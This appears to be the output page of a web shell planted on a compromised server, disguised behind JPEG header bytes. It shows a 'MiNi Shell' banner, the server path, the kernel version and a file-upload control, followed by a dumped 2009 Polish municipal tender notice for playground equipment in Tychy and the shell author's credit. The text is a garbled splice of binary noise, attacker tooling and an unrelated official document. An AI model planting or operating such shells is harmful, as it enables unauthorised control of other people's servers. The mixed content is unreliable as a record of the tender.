JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090826/140649-N-2009.html

<p class="kh_header"><b>Tychy: Dostawa i montaż sprzętu zabawowego na tereny nieruchomości
administrowane przez Rejony Obsługi Mieszkańców Nr I ÷ V w Tychach.</b><br>
<b>Numer ogłoszenia: 140649 - 2009; data zamieszczenia: 26.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> bip.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości
administrowane przez Rejony Obsługi Mieszkańców Nr I ÷ V w Tychach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa i montaż sprzętu zabawowego, celem wyposażenia placów zabaw na tereny nieruchomości, szczegółowo określone w Załącznikach Nr 1 ÷ 5 , którymi administruje Miejski Zarząd Budynków Mieszkalnych
w Tychach , poprzez swoje jednostki organizacyjne, zwane dalej  ROM-ami, a to :
- ROM Nr I z siedzibą w Tychach przy ul. Arkadowej 9c, nr telefonu (0-32) 227-31-32 
- ROM Nr II z siedzibą w Tychach przy ul. Budowlanych 41, nr telefonu (0-32) 227-29-24 
ROM Nr III z siedzibą w Tychach przy ul.Cyganerii 43, nr telefonu (0-32) 227-31-37     
          - ROM Nr IV z siedzibą w Tychach przy al.Niepodległości 76, nr telefonu (0-32)227-22-02     
         - ROM Nr V z siedzibą w Tychach przy ul. Budowlanych 41, nr telefonu (0-32) 227-75-34;

2.	Zamówienie składa się 5 części zwane dalej zadaniami. 
            Oznaczenie zadań: 
           ZADANIE Nr 1 - Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr I

           ZADANIE Nr 2 - Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr II

           ZADANIE Nr 3 - Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr III
                                                                            
       ZADANIE Nr 4 - Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                 administrowane przez ROM Nr IV

       ZADANIE Nr 5 - Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                 administrowane przez ROM Nr V

   3.   Szczegółowy zakres zamówienia:
     1)  dostawa i montaż sprzętu zabawowego, celem wyposażenia placów zabaw             
     2)  dostawa i montaż sprzętu dotyczy nieruchomości wymienionych w Załączniku Nr 1
          do SIWZ oraz w formularzu oferty cenowej, zawierającym ilość sprzętu zabawowego 
          z wyszczególnieniem rodzaju sprzętu przypadającą na daną nieruchomość
     3)  wykonywanie przedmiotu zamówienia odbywać się będzie wg. harmonogramu 
          uzgodnionego z pracownikiem ROM
     4)  oferowany sprzęt zabawowy winien posiadać certyfikat bezpieczeństwa i atest 
           higieniczny zgodnie z Polską Normą lub Polską Normą z europejską aprobatą 
           techniczną; Wymaganie zgodne z PN-EN 1176-1:7; 
    5)  Zamówienie zostanie zrealizowane przez Wykonawcę własnym środkiem transportu;.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 39.11.36.00-3, 37.46.15.00-2, 37.53.52.70-0, 37.53.52.30-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na 
      podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych
      (tekst jednolity Dz.U. z 20 listopada 2007 r., Nr 223, poz. 1655, ze zm.), tj.:  
    a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
          ustawy nakładają obowiązek posiadania takich uprawnień; 
    b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
         i osobami zdolnymi do wykonania zamówienia lub  przedstawią pisemne zobowiązanie 
         innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
         wykonania zamówienia; 
   c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;    
   d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
        oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> ZAMAWIAJĄCY WYMAGA, ABY WYKONAWCA WYKAZAŁ, ŻE:

  1)  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
  o wartości ubezpieczenia nie mniejszej niż:    
       -  40 000,00 zł  -  dla ZADANIA Nr 1  
       -  50 000,00 zł  -  dla ZADANIA Nr 2  
       -  30 000,00 zł  -  dla ZADANIA Nr 3  
       -  20 000,00 zł  -  dla ZADANIA Nr 4  
         -    7 000,00 zł  -  dla ZADANIA Nr  5

 2)  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia 
publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
zrealizował co najmniej dwie dostawy odpowiadające swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia - należy wykazać:  

  -  dla ZADANIA Nr 1 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 20 000,00 zł ( brutto);

  -  dla ZADANIA Nr 2 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 28 000,00 zł ( brutto)

  -  dla ZADANIA Nr 3 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 17 000,00 zł ( brutto)

 -  dla ZADANIA Nr 4 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
    placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
    nie mniejszej niż 14 000,00 zł ( brutto)

 -  dla ZADANIA Nr 5 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
    placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
    nie mniejszej niż 3 500,00 zł ( brutto)

2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie wymaganych oświadczeń i dokumentów według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYKONAWCA WRAZ Z OFERTĄ SKŁADA NASTĘPUJĄCE OŚWIADCZENIA I DOKUMENTY: 

1.  Oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
       stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1)÷ 4)  ustawy - Pzp. 
        - wzór druku oświadczenia stanowi załącznik do specyfikacji,
        (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia  
        oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)
               
   1.1. Na potwierdzenie, że Wykonawca posiada uprawnienia do wykonywania określonej 
        działalności lub czynności (art. 22 ust. 1 pkt. 1 ustawy -Pzp.) oraz, że nie podlega 
        wykluczeniu z postępowania o udzielenie zamówienia (art. 22 ust. 1 pkt. 4) ustawy-Pzp.):  

 a)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
       niż 6 miesięcy przed upływem terminu składania ofert ;   

b) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
     właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
       podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , 
       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych 
       nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
       (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
    przedmiotowe dokumenty wymienione w punkcie 1.1.lit.a) i b) muszą być złożone dla każdego z nich).
1.2.  Na potwierdzenie, że Wykonawca posiada niezbędna wiedzę i doświadczenie oraz, 
       że dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
      (art. 22 ust. 1 pkt. 2 ustawy- Pzp.) :  
  a) wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia 
      postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy- w tym 
      okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot 
      zamówienia, z podaniem ich wartości , przedmiotu ,daty wykonania i odbiorców, w którym 
      należy wykazać:  
  -  dla ZADANIA Nr 1 - co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 20 000,00 zł ( brutto) oraz dołączyć dokumenty potwierdzające, że 
     te dostawy zostały wykonane należycie;


  -  dla ZADANIA Nr 2 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 28 000,00 zł ( brutto) oraz dołączyć dokumenty potwierdzające, że 
     te dostawy zostały wykonane należycie;

  -  dla ZADANIA Nr 3 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
     placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
     nie mniejszej niż 17 000,00 zł ( brutto) oraz dołączyć dokumenty potwierdzające, że 
     te dostawy zostały wykonane należycie;

 -  dla ZADANIA Nr 4 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
    placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
    nie mniejszej niż 14 000,00 zł ( brutto) oraz dołączyć dokumenty potwierdzające, że 
     te dostawy zostały wykonane należycie;


 -  dla ZADANIA Nr 5 -  co najmniej dwie dostawy sprzętu zabawowego wraz z montażem na   
    placach zabaw,  zrealizowane w ramach odrębnych umów o wartości każdej z nich 
    nie mniejszej niż 3 500,00 zł ( brutto) oraz dołączyć dokumenty potwierdzające, że 
     te dostawy zostały wykonane należycie;

   - Wykaz/ wykazy dostaw dla wybranego zadania należy sporządzić wg wzoru druku 
     stanowiącego załącznik do SIWZ.

   (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  
    łącznie lub co najmniej jeden z Wykonawców).    
          
1.3.  Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej  
        zapewniającej wykonanie zamówienia ( art. 22. ust.1 pkt. 3 ustawy -Pzp.) 

a)  aktualna polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca
      jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności
     o wartości ubezpieczenia nie mniejszej niż:  
       -  40 000,00 zł  -  dla ZADANIA Nr 1  
       -  50 000,00 zł  -  dla ZADANIA Nr 2  
       -  30 000,00 zł  -  dla ZADANIA Nr 3  
       -  20 000,00 zł  -  dla ZADANIA Nr 4  
         -    7 000,00 zł  -  dla ZADANIA Nr  5
     Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN ,Zamawiający przeliczy na PLN, 
     przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez 
     Narodowy Bank Polski.
    (W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za 
      spełniony, jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co 
     najmniej jeden z Wykonawców)  
                   
2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     (Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1.1. lit. a) i b) - składa 
     dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce 
     zamieszkania, potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i 
          zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie 
          na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego 
          organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub 
     miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie w pkt. 1.1. 
     lit. a) i b) zastępuje się je dokumentem zawierającym oświadczenie złożone przed 
     notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu 
     zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym 
     Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 43-100 Tychy, ul. Filaretów 31 - pokój Nr 20 , cena 22 zł (brutto) lub za 
  zaliczeniem pocztowym. Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej przekazanie..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2009 godzina 13:15, miejsce: Miejski Zarząd Budynków Mieszkalnych w Tychach,
SEKRETARIAT -  pokój nr 15,  43-100 Tychy, ul. Filaretów 31.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr I
Szczegółowy opis zamówienia określa Załącznik Nr 1 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 39.11.36.00-3, 37.53.52.70-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE Nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr II
Szczegółowy opis zamówienia określa Załącznik Nr 2 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 39.11.36.00-3, 37.46.15.00-2, 37.53.52.70-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZADANIE Nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr III
Szczegółowy opis zamówienia określa Załącznik Nr 3 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 39.11.36.00-3, 37.53.52.30-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ZADANIE Nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr IV
Szczegółowy opis zamówienia określa Załącznik Nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 39.11.36.00-3, 37.53.52.70-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> ZADANIE Nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa i montaż sprzętu zabawowego na tereny nieruchomości,
                                     administrowane przez ROM Nr V
Szczegółowy opis zamówienia określa Załącznik Nr 5 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.53.51.00-8, 37.53.52.70-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com